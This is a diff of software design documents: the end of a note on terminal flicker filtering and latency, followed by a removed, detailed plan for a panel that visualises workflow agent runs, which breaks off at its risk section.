||||
## Optional Flicker Filter
|
||||
|
||||
Per-session toggle via Session Settings. Adds ~50ms latency but eliminates remaining flicker on problematic terminals.
|
||||
|
||||
### Detection Patterns
|
||||
|
||||
- `ESC[2J` — Clear entire screen
|
||||
- `ESC[H ESC[J` — Cursor home + clear to end
|
||||
- `ESC[?25l ESC[H` — Hide cursor + home (Ink pattern)
|
||||
- `ESC[nA` (n≥1) — Cursor up (Ink line redraw)
|
||||
|
||||
When detected, buffers 50ms of subsequent output before flushing atomically.
|
||||
|
||||
## Latency Analysis
|
||||
|
||||
| Source | Best Case | Worst Case | Notes |
|
||||
|--------|-----------|------------|-------|
|
||||
| Server batching | 0ms (flush) | 50ms (rapid events) | Immediate flush if >32KB |
|
||||
| Sync block wait | 0ms | 50ms | Only if marker split across packets |
|
||||
| Flicker filter | 0ms (disabled) | 50ms (enabled) | Optional per-session |
|
||||
| rAF scheduling | 0ms | 16ms | Display refresh sync |
|
||||
| **Total** | **0ms** | **~115ms** | Worst case rare in practice |
|
||||
|
||||
**Typical latency:** 16-32ms (server batch + rAF)
|
||||
|
||||
## Edge Cases
|
||||
|
||||
- **Incomplete sync blocks**: 50ms timeout forces flush (content discarded to prevent freeze)
|
||||
- **Large buffers**: Chunked writing prevents UI freeze
|
||||
- **Server shutdown**: Skips batching via `_isStopping` flag
|
||||
- **Session switch**: Clears flicker filter state, pending writes, and sync timeout (prevents cross-session data bleed)
|
||||
- **SSE reconnect**: `handleInit()` clears all pending write state
|
||||
|
||||
**Trade-off:** If a sync block is split across SSE packets and the end marker doesn't arrive within 50ms, the incomplete content is discarded. This prioritizes responsiveness over completeness. In practice this is rare since the server always sends complete `SYNC_START...SYNC_END` pairs and SSE typically delivers them atomically.
|
||||
|
||||
## DEC Mode 2026 Compatibility
|
||||
|
||||
Terminals that natively support DEC 2026 will buffer and render atomically. Terminals that don't support it ignore the escape sequences harmlessly. xterm.js doesn't support DEC 2026 natively, so the client implements its own buffering by parsing the markers.
|
||||
|
||||
**Supporting terminals:** WezTerm, Kitty, Ghostty, iTerm2 3.5+, Windows Terminal, VSCode terminal
|
||||
|
||||
## Files Involved
|
||||
|
||||
| File | Key Functions |
|
||||
|------|---------------|
|
||||
| `src/web/server.ts` | `batchTerminalData()`, `flushTerminalBatches()`, `broadcast()` |
|
||||
| `src/web/public/app.js` | `batchTerminalWrite()`, `extractSyncSegments()`, `flushPendingWrites()`, `flushFlickerBuffer()`, `chunkedTerminalWrite()` |
|
||||
@@ -1,271 +0,0 @@
|
||||
# Ultracode / Workflow Agent Visualization — Design & Implementation Plan
|
||||
|
||||
> **Status: IMPLEMENTED (2026-06-15, rev. 3) — Phases 1–3 shipped & verified; Phase 4 (live-transcript link) deferred.** A dedicated, opt-in **master-detail tab** (`showUltracodeAgents`, default OFF) shows ultracode/Workflow runs as Claude Code's "working agents" TUI: LEFT = runs + phases (selectable tasks), RIGHT = each run's agents with model, live state, **tokens burned**, and **tool calls**.
|
||||
>
|
||||
> ### What rev. 3 changed vs. rev. 2 (decided during implementation against on-disk truth)
|
||||
> 1. **UI is a master-detail TAB, not grouped floating subagent windows.** The user asked for the CC "working agents" view (left task picker, right agent stats). Built as a new docked panel `#ultracodeAgentsPanel` (clones `.subagents-panel` master-detail CSS) + `src/web/public/ultracode-panel.js` — NOT via `openSubagentWindow`/grouped windows.
|
||||
> 2. **STANDALONE — zero edits to `subagent-watcher.ts`.** w16-claudeman's commit `f6a30d7` already discovers the per-agent workflow *transcripts* (`watchWorkflowDirs`). The data the view needs (run/phase/per-agent tokens+toolCalls) lives in the *run-state* JSON, read by a brand-new `src/workflow-run-watcher.ts` (globs the disjoint `…/workflows/wf_*.json` tree). No shared files with w16.
|
||||
> 3. **No per-agent transcript streaming needed for v1.** The run-state JSON already carries `tokens`/`toolCalls`/`state`/`label`/`phase` per agent, so the whole view reads from `wf_<runId>.json` alone. (Phase 4 will optionally link a card to its already-tracked transcript via `agentId` — no watcher edits.)
|
||||
> 4. **Agent states are `start | progress | done`** (verified on disk) — NOT running/queued. `start`=queued (no agentId/tokens/toolCalls yet), `done` has `durationMs`/`resultPreview`.
|
||||
> 5. **The run JSON's `script` (15–660KB embedded JS), `scriptPath`, `result`, `logs` are STRIPPED in the watcher** before caching/broadcast (a 28-agent run drops 174KB → ~25KB; `promptPreview`/`resultPreview` truncated).
|
||||
> 6. **SSE/snapshot ship lightweight run SUMMARIES (no `agents[]`); the RIGHT pane fetches the full run** via `GET /api/workflows/:runId` on selection. (A 25-run snapshot is ~20KB vs ~900KB if it carried every agent.) The LEFT list shows ALL cached runs (LRU-bounded), not a recency window — a run browser must show past runs.
|
||||
>
|
||||
> _Original rev. 2 proposal (grouped floating windows, extending subagent-watcher) preserved below for context; superseded by the above._
|
||||
|
||||
### What changed in rev. 2 (vs. the first draft)
|
||||
|
||||
1. **No backend cross-watcher coupling.** The per-agent label/phase/agentType/state **join moves to the frontend at render time** — the run object already carries every agent's entry keyed by `agentId`. This deletes `subagent-watcher`'s backward dependency on `workflow-run-watcher` (`getAgentLabel()` + its TTL cache), removes the registration-vs-run-state **race** (labels always track the latest `workflow:run_updated`), and drops the per-agent `meta.json` read from the hot path.
|
||||
2. **`SubagentInfo` grows by 2 fields, not 4** (`isWorkflowAgent`, `workflowRunId`) — both derivable from the file path alone at registration, zero extra I/O. `agentType`/`label`/`phase`/`state` come from the run object on the frontend.
|
||||
3. **The `isInternalAgent` bypass covers BOTH drop sites** — `registerAgentFile` *and* the late re-resolution in `processEntry`. The first draft named only one.
|
||||
4. **De-duplicated.** Each trap (`journal.jsonl`, the `projects/*/*/workflows` depth, the gate-mismatch lesson, reuse-not-rebuild) is stated once in its owning section.
|
||||
|
||||
### Code-reuse verified against the tree (2026-06-14)
|
||||
|
||||
Confirmed present and shaped as assumed: `subagent-watcher.ts` — `watchSubagentDir`/`registerAgentFile`/`tailFile`/`processEntry`, `getRecentSubagents`, `isInternalAgent` (drops on `MIN_DESCRIPTION_LENGTH=5`), `STARTUP_MAX_FILE_AGE_MS=4h`, `MAX_TRACKED_AGENTS`, `knownSubagentDirs`/`dirWatchers`. `team-watcher.ts` — `configMtimes` mtime-skip + chokidar + `setInterval` poll. `server.ts` — `setupSubagentWatcherListeners`, `getLightState()` (`subagents: getRecentSubagents(15)`, `LIGHT_STATE_CACHE_TTL_MS=1000`), `isSubagentTrackingEnabled()` (`settings.subagentTrackingEnabled ?? true`). Frontend — `_SSE_HANDLER_MAP`, `this.subagents` Map, `handleInit`/`cleanupAllFloatingWindows`, `renderSubagentPanel`/`_renderSubagentPanelImmediate`, `getTeammateBadgeHtml`, `openSubagentWindow` + `.subagent-window-parent` sub-header.
|
||||
|
||||
## 1. The enabling fact: on-disk artifacts
|
||||
|
||||
The Workflow tool (what `ultracode` drives) persists each workflow agent as a transcript under the **same `subagents/` directory Codeman already watches**, one level deeper. Empirically verified against a real run (`wf_a8e09f2c-550`); **re-confirm the shape against a fresh run at implementation time** (§8 mandates a live e2e pass anyway):
|
||||
|
||||
```
|
||||
~/.claude/projects/<projHash>/<sessionUuid>/
|
||||
├─ subagents/
|
||||
│ ├─ agent-XX.jsonl ← regular Task subagent (tracked today)
|
||||
│ └─ workflows/wf_<runId>/
|
||||
│ ├─ agent-YY.jsonl ← WORKFLOW agent — IDENTICAL line format
|
||||
│ ├─ agent-YY.meta.json ← {"agentType":"workflow-subagent"} (optional enrichment)
|
||||
│ └─ journal.jsonl ← run journal {type:"started",...} — MUST be skipped
|
||||
└─ workflows/wf_<runId>.json ← run state: runId, workflowName, summary, status,
|
||||
phases[], workflowProgress[], totals (DIFFERENT tree)
|
||||
```
|
||||
|
||||
The per-agent `.jsonl` line shape is identical to a regular subagent transcript:
|
||||
|
||||
```jsonc
|
||||
{ "parentUuid": null, "isSidechain": true, "agentId": "ac6a1d27012a64e38",
|
||||
"type": "user" | "assistant", "message": { "role": "...", "content": "..." }, ... }
|
||||
```
|
||||
|
||||
Because the line shape is identical, the entire existing parse→event→render pipeline works unchanged once discovery reaches those files. The only new data is the **run-level metadata** in `workflows/wf_<runId>.json` (name, summary, phases, and `workflowProgress[]` — the per-agent labels/state/tools), which supplies the group header and per-agent labels.
|
||||
|
||||
**Can show:** per-agent live transcript (tool calls, messages, results); per-agent status (active/idle/completed via the existing mtime/PID/pgrep liveness); per-agent model + running token totals (from each agent's JSONL `message.usage`, exactly as today); the run's `workflowName`/`summary`/`phases[]`; per-agent `label`/`phaseTitle`/`state`/`lastToolName` (from `workflowProgress[]`); grouping under `wf_<runId>`.
|
||||
|
||||
**Cannot show:** anything absent from the artifacts — a live phase cursor beyond `workflowProgress[].state`; an authoritative **budget/cost ceiling** (only consumed totals exist — `usage` + run-state `totalTokens`, no remaining-budget field); runs older than `STARTUP_MAX_FILE_AGE_MS` (4h) after a server restart (live monitoring only).
|
||||
|
||||
## 2. Architecture
|
||||
|
||||
**Decision: EXTEND `subagent-watcher.ts` for per-agent discovery/streaming; ADD a thin `workflow-run-watcher.ts` (modeled on `team-watcher.ts`) for the group-header metadata ONLY. The agent→run-metadata join happens on the FRONTEND, so the two watchers stay decoupled.**
|
||||
|
||||
- The per-agent JSONL is identical in shape, so re-running it through `registerAgentFile()` → `tailFile()` → `processEntry()` and the existing `subagent:*` events is free and reconnect-safe (those agents land in `agentInfo`, replayed by `getRecentSubagents(15)`). A parallel per-agent watcher would duplicate the liveness/token/tool-call/SSE machinery for zero benefit.
|
||||
- Run metadata lives in a *different* file under a *different* tree (`workflows/wf_<runId>.json`, sibling to `subagents/`). A small `WorkflowRunWatcher` watching `projects/*/*/workflows/wf_*.json` (mtime-skip, like `team-watcher`'s `configMtimes`) is the clean home; folding it into `subagent-watcher` would entangle two unrelated watch roots and put a JSON re-read in the hot per-line path.
|
||||
- **The two watchers never call each other.** The frontend receives both streams and joins agent→label by `agentId` at render time (the run object carries every agent's entry). This removes the timing coupling entirely.
|
||||
|
||||
```
|
||||
~/.claude/projects/<projHash>/<sessionUuid>/
|
||||
├─ subagents/
|
||||
│ ├─ agent-XX.jsonl ──────────────► SubagentWatcher (EXTENDED: also descends
|
||||
│ └─ workflows/wf_<runId>/ workflows/wf_<runId>/, tags isWorkflowAgent+runId)
|
||||
│ ├─ agent-YY.jsonl ─┐ reuse registerAgentFile/tailFile/processEntry
|
||||
│ └─ journal.jsonl (SKIP) emits subagent:* (now w/ 2 workflow fields)
|
||||
└─ workflows/wf_<runId>.json ──────► WorkflowRunWatcher (NEW, team-watcher-shaped)
|
||||
{workflowName,phases,workflowProgress[]} emits workflow:run_discovered|updated|removed
|
||||
|
||||
server.ts
|
||||
setupSubagentWatcherListeners() ──► broadcast(subagent:*) ─┐
|
||||
setupWorkflowRunWatcherListeners() ──► broadcast(workflow:run_*) │ SSE
|
||||
getLightState(): subagents + workflowRuns ───────────────────────┘
|
||||
│
|
||||
▼ app.js dispatch table
|
||||
panels-ui: partition this.subagents by workflowRunId; header + per-agent
|
||||
labels JOINED from this.workflowRuns.get(runId).agents (by agentId)
|
||||
```
|
||||
|
||||
## 3. Backend changes (ordered, file-by-file)
|
||||
|
||||
### 3a. `src/subagent-watcher.ts` — nested discovery + 2 tag fields
|
||||
|
||||
**(1) Extend `SubagentInfo` with exactly two optional fields** (optional → regular subagents and the wire shape are unaffected):
|
||||
|
||||
```ts
|
||||
isWorkflowAgent?: boolean; // true when discovered under subagents/workflows/<wf_runId>/
|
||||
workflowRunId?: string; // e.g. "wf_23dbeab2-152" (parent dir name)
|
||||
```
|
||||
|
||||
Both are derived from the **file path alone** at registration — no extra reads. They ride existing `subagent:discovered|updated|completed` payloads (no new per-agent event). Do **not** add `agentType`/`label`/`phase`/`workflowName` here — those come from the run object on the frontend (§4c).
|
||||
|
||||
**(2) Constant.** `const WORKFLOWS_SUBDIR = 'workflows';` near the existing dir constants.
|
||||
|
||||
**(3) `watchSubagentDir()` — descend into `workflows/<wf_runId>/`.** After the existing direct-child registration loop:
|
||||
|
||||
```ts
|
||||
// Workflow agents live one level deeper: subagents/workflows/<wf_runId>/agent-*.jsonl
|
||||
const wfRoot = join(dir, WORKFLOWS_SUBDIR);
|
||||
try {
|
||||
for (const runId of await readdir(wfRoot)) {
|
||||
if (!runId.startsWith('wf_')) continue;
|
||||
await this.watchWorkflowRunDir(join(wfRoot, runId), projectHash, sessionId, runId);
|
||||
}
|
||||
} catch { /* no workflows subdir — normal for most sessions */ }
|
||||
```
|
||||
|
||||
The existing `fs.watch(dir, …)` on `subagents/` is **non-recursive on Linux** and won't fire for writes inside `workflows/<runId>/`, so each run dir needs its own watcher.
|
||||
|
||||
**(4) New private `watchWorkflowRunDir(runDir, projectHash, sessionId, runId)`** — clone `watchSubagentDir`'s structure, but:
|
||||
- Register only files matching `^agent-.*\.jsonl$`, **explicitly skipping `journal.jsonl`** (it ends in `.jsonl` but is `{type:'started',…}`, not a transcript — registering it would create a phantom agent).
|
||||
- Call `registerAgentFile(filePath, projectHash, sessionId, isInitialScan, runId)` so the agent is tagged.
|
||||
- Install one `watch(runDir, …)` per run dir; on `error` and `stop()`, reuse the existing teardown (close + delete from `dirWatchers`/`knownSubagentDirs`/`dirWatcherErrorHandlers`).
|
||||
- Guard re-registration **per run dir** in `knownSubagentDirs`, **not** `wfRoot` — the 5s full scan must still re-`readdir(wfRoot)` to pick up *new* `wf_<runId>` dirs created mid-session.
|
||||
|
||||
**(5) `registerAgentFile()` — accept + apply `runId`.** Add a trailing optional `runId?: string`. When set, the whole change is:
|
||||
|
||||
```ts
|
||||
if (runId) { info.isWorkflowAgent = true; info.workflowRunId = runId; }
|
||||
```
|
||||
|
||||
No `meta.json` read, no run-state lookup, no description override. `agentId`s are globally unique `a<16hex>` (verified: 0 collisions across a 370-agent corpus), so keep the flat `agentInfo` map keyed by `agentId` — do **not** switch to a composite key. Add a one-line dev-assert log if `agentInfo.has(agentId)` with a *different* `workflowRunId`, so a future collision is observable.
|
||||
|
||||
**(6) `isInternalAgent` bypass — BOTH drop sites.** Workflow agents have no Task-tool spawn record, so `_resolveDescription` yields only the first-user-message fallback (often a long phase prompt) or empty → `isInternalAgent` (`length < MIN_DESCRIPTION_LENGTH`) would wrongly drop them. They are real by construction (the `subagents/workflows/wf_*/` path is the discriminator). Gate the drop on `!info.isWorkflowAgent` at **both** places:
|
||||
- `registerAgentFile` initial check (`isInternalAgent(description)`),
|
||||
- `processEntry`'s late re-resolution (the second `isInternalAgent` call).
|
||||
|
||||
**(7) `stop()` teardown.** Per-run watchers live in `dirWatchers`, so the existing close-all loop covers them — verify no separate map was introduced (24h runs spawn many `wf_<runId>` dirs → FSWatcher leak risk).
|
||||
|
||||
### 3b. NEW `src/workflow-run-watcher.ts` (singleton, EventEmitter — model on `team-watcher.ts`)
|
||||
|
||||
- **Watch root:** `~/.claude/projects/<projHash>/<sessionUuid>/workflows/wf_*.json` — **two** levels under `projects` (verified: `projects/*/workflows` is empty; must be `projects/*/*/workflows/`). chokidar `depth:3` + a poll fallback, mirroring `team-watcher`'s dual discovery + interval.
|
||||
- **mtime-skip:** `runMtimes: Map<absPath, number>` (mirror `team-watcher.configMtimes`).
|
||||
- **Parse:** read `wf_<runId>.json`, take the **top-level structured keys** (`runId`, `workflowName`, `summary`, `status`, `phases:[{title,detail}]`, `agentCount`, `defaultModel`, `durationMs`, `totalTokens`, `totalToolCalls`, `workflowProgress[]`). **Do NOT parse the embedded `script` string** — name/phases/summary are already top-level; the script's `export const meta` is redundant and costly. Derive `sessionUuid` from the dir name, `projectHash` from the dir above; expose `getProjectHash(workingDir)` for Codeman-session correlation.
|
||||
- **`workflowProgress[] → agents[]`:** filter `type === 'workflow_agent'`, map each to a `WorkflowAgentEntry` (§3c) keyed by `agentId`. **This array is the join source the frontend uses** — no backend `getAgentLabel()` API, no TTL cache, no import from `subagent-watcher`.
|
||||
- **Emit** `workflow:run_discovered|updated|removed` carrying `WorkflowRunInfo`; removal by set-diff (mirror `team-watcher`).
|
||||
- **Lifecycle:** `start()`/`stop()` with `CleanupManager` teardown of chokidar + interval + caches; `LRUMap`-bounded run cache (24h memory rule).
|
||||
|
||||
### 3c. `src/types/` — workflow run types
|
||||
|
||||
```ts
|
||||
export interface WorkflowAgentEntry { // one workflowProgress[type==='workflow_agent']
|
||||
agentId: string; label: string; phaseIndex?: number; phaseTitle?: string;
|
||||
agentType?: string; model?: string; state?: string; // 'done'|'running'|'queued'|...
|
||||
lastToolName?: string; lastToolSummary?: string; tokens?: number; toolCalls?: number;
|
||||
}
|
||||
export interface WorkflowRunInfo {
|
||||
runId: string; sessionUuid: string; projectHash: string;
|
||||
workflowName?: string; summary?: string; status?: string; // 'running'|'completed'|...
|
||||
phases: Array<{ title: string; detail?: string }>;
|
||||
agentCount?: number; defaultModel?: string;
|
||||
agents: WorkflowAgentEntry[]; // workflowProgress filtered to workflow_agent, keyed by agentId
|
||||
startedAt?: number; durationMs?: number; totalTokens?: number; totalToolCalls?: number;
|
||||
}
|
||||
```
|
||||
|
||||
The two `SubagentInfo` workflow fields stay inline in `subagent-watcher.ts` (matching the existing convention).
|
||||
|
||||
### 3d. `src/web/sse-events.ts` — register run events
|
||||
|
||||
Add `workflow:run_discovered`, `workflow:run_updated`, `workflow:run_removed` after the `subagent:*` block and to the `SseEvent` union. **No new per-agent event** — workflow agents reuse `subagent:*`.
|
||||
|
||||
### 3e. `src/web/server.ts` — bridge, snapshot, gating
|
||||
|
||||
- **`setupWorkflowRunWatcherListeners()`** (beside `setupSubagentWatcherListeners`): map the three run events → `this.broadcast(...)`. Add `cleanupWorkflowRunWatcherListeners()` (store handler refs).
|
||||
- **Start/stop:** call `workflowRunWatcher.start()`/`.stop()` beside `subagentWatcher`, **gated on the same enable condition** (§3f).
|
||||
- **`getLightState()`:** add `workflowRuns: workflowRunWatcher.getRecentRuns(15)` beside `subagents: subagentWatcher.getRecentSubagents(15)` so headers replay on reconnect (agents already replay via `subagents`). Keep the `LIGHT_STATE_CACHE_TTL_MS` memoization.
|
||||
- **Gating read:** add `isWorkflowAgentTrackingEnabled()` mirroring `isSubagentTrackingEnabled()` (boot-time `dataPath('settings.json')` read). Gate `workflowRunWatcher.start()` **and** the subagent-watcher `workflows/` descent (§3a-3) on `showUltracodeAgents` so non-opted-in users never register historical workflow agents.
|
||||
|
||||
### 3f. `src/web/schemas.ts` — settings key
|
||||
|
||||
Add `showUltracodeAgents: z.boolean().optional()` to the `.strict()` settings update schema near `showPlanUsageLimits` (required — `.strict()` 400s the whole PUT on an unknown key).
|
||||
|
||||
### 3g. `src/web/routes/system-routes.ts` — poll API
|
||||
|
||||
- `GET /api/subagents` and `GET /api/sessions/:id/subagents` include workflow agents once registered — **no change** (they carry `isWorkflowAgent`/`workflowRunId`; a consumer joins to `/api/workflows/:runId` for labels).
|
||||
- Add `GET /api/workflows` → `workflowRunWatcher.getRecentRuns()` and `GET /api/workflows/:runId` (uniform `ApiResponse` contract; headers are also in `getLightState`).
|
||||
- `GET /api/subagents/:agentId/transcript` works for workflow agents (they're in `agentInfo`) — no new route.
|
||||
|
||||
## 4. Frontend changes (file-by-file)
|
||||
|
||||
### 4a. `src/web/public/constants.js`
|
||||
- Add the three SSE strings to `SSE_EVENTS`, matching §3d exactly (`WORKFLOW_RUN_DISCOVERED: 'workflow:run_discovered'`, etc.).
|
||||
- Reuse `ZINDEX_SUBAGENT_BASE=1000` for the agent windows (they ARE subagent windows). The group **header/cluster** is in-flow panel DOM, not a floating window — no new z-index (1100 is plan-subagent).
|
||||
|
||||
### 4b. `src/web/public/app.js`
|
||||
- Constructor: `this.workflowRuns = new Map(); // runId -> WorkflowRunInfo` beside `this.subagents`.
|
||||
- `_SSE_HANDLER_MAP`: add three rows → `_onWorkflowRunDiscovered/Updated/Removed` (must exist before `connectSSE` builds the wrappers).
|
||||
- `handleInit`: after seeding `data.subagents`, seed `this.workflowRuns` from `data.workflowRuns` (clear-then-set). **Clear `this.workflowRuns` everywhere the subagent Maps are cleared** (incl. `cleanupAllFloatingWindows`) — 24h leak guard.
|
||||
|
||||
### 4c. `src/web/public/panels-ui.js` — the join lives here
|
||||
- `_onWorkflowRunDiscovered/Updated(data)` → `this.workflowRuns.set(data.runId, data)` + debounced re-render; `_onWorkflowRunRemoved` → delete + re-render.
|
||||
- **No change to `_onSubagentDiscovered/Updated`** — they already store the whole payload, so the 2 new fields ride along.
|
||||
- `renderSubagentPanel`/`_renderSubagentPanelImmediate`: when `showUltracodeAgents` is on, **partition `this.subagents` into flat (no `workflowRunId`) vs grouped-by-`workflowRunId`**. Flat agents render exactly as today. For each group: build the header from `this.workflowRuns.get(runId)` (`workflowName` + phase/status chip from `phases[]`), then render that run's agents reusing the existing per-agent row markup. **Per-agent label/phase/agentType come from the JOIN** — build `Map(agentId → entry)` from `this.workflowRuns.get(runId).agents` and look each agent up by `agent.agentId`; render the small chip via the `getTeammateBadgeHtml` pattern. (If the run object hasn't arrived yet, fall back to the agent's own `description` — the run `:updated` event will fill it in on the next render.)
|
||||
- `findParentSessionForSubagent` is unchanged — workflow agent `sessionId === session.claudeSessionId`. **Do not conflate `workflowRunId` with `sessionId`.**
|
||||
|
||||
### 4d. `src/web/public/subagent-windows.js`
|
||||
**Decision: REUSE `.subagent-window` per agent + a group sub-header — do NOT build a cluster class.** A cluster path duplicates Map/z-index/drag/cleanup/persistence for no functional gain; reuse keeps connection lines, minimize-to-tab, and `localStorage` persistence. In `openSubagentWindow`, where the optional `.subagent-window-parent` sub-header is built: when `agent.workflowRunId` is set, inject a `.subagent-workflow-header` showing `this.workflowRuns.get(runId)?.workflowName` + the joined agent's `label`/phase (look up by `agentId`), mirroring the `from <session>` sub-header. Respect the existing skip guards (teammate-terminal windows, minimized/`_lazyTerminal`).
|
||||
|
||||
**Do NOT auto-open windows** for workflow agents — a multi-phase run can spawn many, against the 50-window/60fps budget + `MAX_TRACKED_AGENTS=500`. They render collapsed in the grouped panel; the user expands via the existing panel buttons.
|
||||
|
||||
### 4e. `src/web/public/settings-ui.js` + `index.html`
|
||||
- `index.html` Panels block: add a `settings-item` checkbox `id="appSettingsShowUltracodeAgents"` ("Show ULTRACODE / Workflow Agents").
|
||||
- `openAppSettings`: load `settings.showUltracodeAgents` with `false` fallback (mirror `showPlanUsageLimits`).
|
||||
- `saveAppSettings`: collect `showUltracodeAgents` into the fresh settings literal (uncollected keys reset to default every save).
|
||||
- Live-apply on toggle: re-run `renderSubagentPanel()` (show/hide group sections) — a panel re-render, not a CSS-class strip.
|
||||
- **SYNCED, not per-device:** do NOT add `showUltracodeAgents` to `displayKeys` and do NOT strip it in the per-device block. A synced value gives the server-side gate (`isWorkflowAgentTrackingEnabled`, §3e) one canonical truth to decide whether to run the watcher; a per-device value can't gate a process-wide watcher. (Contrast `showResponseViewer`, pure client display.)
|
||||
- `styles.css` + `mobile.css`: add `.subagent-workflow-header` and `.subagent-group-badge` next to `.subagent-window-parent`; mirror device overrides in `mobile.css`.
|
||||
|
||||
## 5. Settings / opt-in wiring
|
||||
|
||||
- **Key:** `showUltracodeAgents` (boolean, **default OFF**). Fallback `false` in `openAppSettings`; "absent ⇒ off" in `isWorkflowAgentTrackingEnabled()`. Schema `z.boolean().optional()` in the `.strict()` update schema, kept OUT of `displayKeys` (synced).
|
||||
- **Runtime gating:** `workflowRunWatcher.start()` and the subagent-watcher `workflows/` descent run only when the boot-time `settings.json` read reports `showUltracodeAgents === true` (mirroring `isSubagentTrackingEnabled`). The frontend additionally gates display. Toggling at runtime gates **display** immediately (panel re-render); the **watcher branch** picks up on next boot — matches existing `subagentTrackingEnabled` semantics. (Optional polish: restart just the workflow watcher on toggle for instant on/off.)
|
||||
|
||||
## 6. SSE events
|
||||
|
||||
**Reused (no change):** `subagent:discovered|updated|tool_call|tool_result|progress|message|completed`. Workflow agents flow through these; payloads now carry the optional `isWorkflowAgent`/`workflowRunId` fields on `SubagentInfo`. SSE payloads aren't schema-gated (typed only at `broadcast()` call sites), so the new fields propagate with zero friction.
|
||||
|
||||
**New (3 events, run-level metadata):**
|
||||
|
||||
| Event (backend const / frontend key) | Payload |
|
||||
|---|---|
|
||||
| `workflow:run_discovered` / `WORKFLOW_RUN_DISCOVERED` | `WorkflowRunInfo` |
|
||||
| `workflow:run_updated` / `WORKFLOW_RUN_UPDATED` | `WorkflowRunInfo` |
|
||||
| `workflow:run_removed` / `WORKFLOW_RUN_REMOVED` | `{ runId: string }` |
|
||||
|
||||
Sync requirement (CLAUDE.md): each must appear in **both** `sse-events.ts` (§3d) and `constants.js` `SSE_EVENTS` (§4a), be emitted via `broadcast()` in `setupWorkflowRunWatcherListeners()` (§3e), and have a dispatch-table row + `_on*` handler (§4b/§4c).
|
||||
|
||||
## 7. Edge cases & cleanup
|
||||
|
||||
- **`journal.jsonl` phantom-agent trap** — owned by §3a-4: run-dir registration requires the `agent-` prefix and excludes `journal.jsonl`.
|
||||
- **`isInternalAgent` over-filtering** — owned by §3a-6: bypass at BOTH drop sites; titled from the frontend join (or the description fallback).
|
||||
- **No workflow agents in the flat list** — `renderSubagentPanel` partitions on `agent.workflowRunId` (§4c). When the toggle is OFF, the descent never ran, so they aren't in `this.subagents` at all.
|
||||
- **Completion/idle** — keep the existing per-agent mtime/PID/pgrep liveness as the per-card source of truth. Optionally render a group-level "workflow done" badge from run-state `status==='completed'`.
|
||||
- **Limits** — `MAX_TRACKED_AGENTS=500` LRU-evicts workflow agents in the same flat map; no auto-open (50-window budget); the 4h `STARTUP_MAX_FILE_AGE_MS` skip means a run completed >4h ago won't reload after restart (acceptable — live monitoring).
|
||||
- **Reconnect/replay** — agents via `getRecentSubagents(15)`; headers via `workflowRuns: getRecentRuns(15)` in `getLightState`. `handleInit` clears `this.workflowRuns` alongside the subagent Maps.
|
||||
- **Watcher teardown** — every per-run `fs.watch` and the chokidar watcher closes in `stop()` and on `error`; `CleanupManager` for the new watcher (24h runs create many run dirs).
|
||||
- **CLAUDE.md discipline** — read-only `~/.claude/...` artifacts; no new `~/.codeman/...` paths, no env-var prefixes touched. Claude-mode-only by nature (external CLIs don't write workflow transcripts).
|
||||
|
||||
## 8. Testing & verification
|
||||
|
||||
- **Unit (pure):**
|
||||
- `test/workflow-run-watcher.test.ts`: feed a scrubbed fixture `wf_<runId>.json` → assert `WorkflowRunInfo` extraction (name/summary/phases, `workflowProgress`→`agents[]` keyed by `agentId`), mtime-skip, removal-by-set-diff.
|
||||
- Extend `subagent-watcher` coverage: temp `subagents/workflows/wf_X/agent-Y.jsonl` + a stray `journal.jsonl` → assert `agent-Y` registered with `isWorkflowAgent`/`workflowRunId` and `journal.jsonl` NOT registered; assert a short-description workflow agent is NOT dropped at **either** `isInternalAgent` site.
|
||||
- **Route/inject (`app.inject`):** `GET /api/workflows` + `:runId` return the `ApiResponse` envelope; `GET /api/subagents` includes a tagged agent.
|
||||
- **Frontend (vm-sandbox, like `test/run-mode-ui.test.ts`):** dispatch `subagent:discovered` with `workflowRunId` + `workflow:run_discovered` → assert `renderSubagentPanel` produces a group section under the workflow name with the agent inside it (label sourced from the **join**, not flat); assert order-independence (agent before run, and run before agent both resolve); assert OFF hides the section.
|
||||
- **REQUIRED real end-to-end** (the always-end-to-end-test rule — the plan-usage chip shipped *dead* from a gate mismatch): on dev/beta with `showUltracodeAgents` ON, **drive a real ultracode/workflow run**, then (1) `curl …/api/workflows | jq` shows the live run with `agents[]`; (2) `curl …/api/subagents | jq '.data[]|select(.isWorkflowAgent)'` shows tagged agents; (3) watch `/api/events` for `workflow:run_discovered` + `subagent:discovered` with the workflow fields; (4) Playwright (`waitUntil:'domcontentloaded'`, wait 3–4s) asserts the grouped DOM cluster renders with the workflow-name header and live status. Verify path gates against `GET /api/sessions` `workingDir`. **Test against a LIVE run** — all at-rest runs are `completed`/`done`; `running`/`queued` states only exist mid-run.
|
||||
|
||||
## 9. Phased rollout
|
||||
|
||||
| Phase | Scope | Done-check | Size |
|
||||
|---|---|---|---|
|
||||
| **P1 — Backend discovery + tagging (gated, no UI)** | §3a (nested descent, `journal.jsonl` skip, 2 `SubagentInfo` fields, `isInternalAgent` bypass ×2) + §3f schema key + §3e gate read. No run watcher yet. | With `showUltracodeAgents` forced on, `curl /api/subagents \| jq '.data[]\|select(.isWorkflowAgent)'` lists real workflow agents during a live run; flat subagents unchanged; `tsc --noEmit` + targeted watcher test green. | S–M |
|
||||
| **P2 — Run-state metadata + SSE** | §3b (`workflow-run-watcher.ts`) + §3c types + §3d/§3e (SSE, bridge, `getLightState` replay) + §3g routes. | `curl /api/workflows \| jq` returns runs with `agents[]`/`phases`; SSE emits `workflow:run_discovered`; reconnect snapshot carries `workflowRuns`. | M |
|
||||
| **P3 — Frontend grouped UI** | §4a–§4d (constants, app.js state/dispatch/init, panels-ui grouped render + **agent→label join**, subagent-windows group sub-header). Reuse `.subagent-window`; no auto-open. | Playwright: live run renders a group section under the workflow name with per-agent rows + live status + joined labels; flat subagents stay flat; expand opens a window with the workflow sub-header. | M |
|
||||
| **P4 — Settings toggle + polish + docs** | §4e (checkbox, settings-ui load/save/live-apply, SYNCED), styles/mobile, phase chips, CLAUDE.md "Key Patterns" entry + this doc's status → SHIPPED. | Toggling the checkbox shows/hides the cluster live (no reload for display); OFF by default on a fresh install; CI green. | S |
|
||||
|
||||
Each phase is independently shippable: P1 is invisible (gated, no UI), P2 adds an API with no UI dependency, P3 lights up the UI for flag-enablers, P4 exposes the toggle and finalizes defaults/docs.
|
||||
|
||||
## 10. Effort & risk
|
||||
|
||||
**Size:** P1 = S–M, P2 = M, P3 = M, P4 = S. Total ≈ **M** (one focused engineer, ~2–4 days incl. the real end-to-end run — down from the first draft's M-L now that the backend join/coupling is gone).
|
||||
|
||||
**Top 3 risks:**
|
||||
|
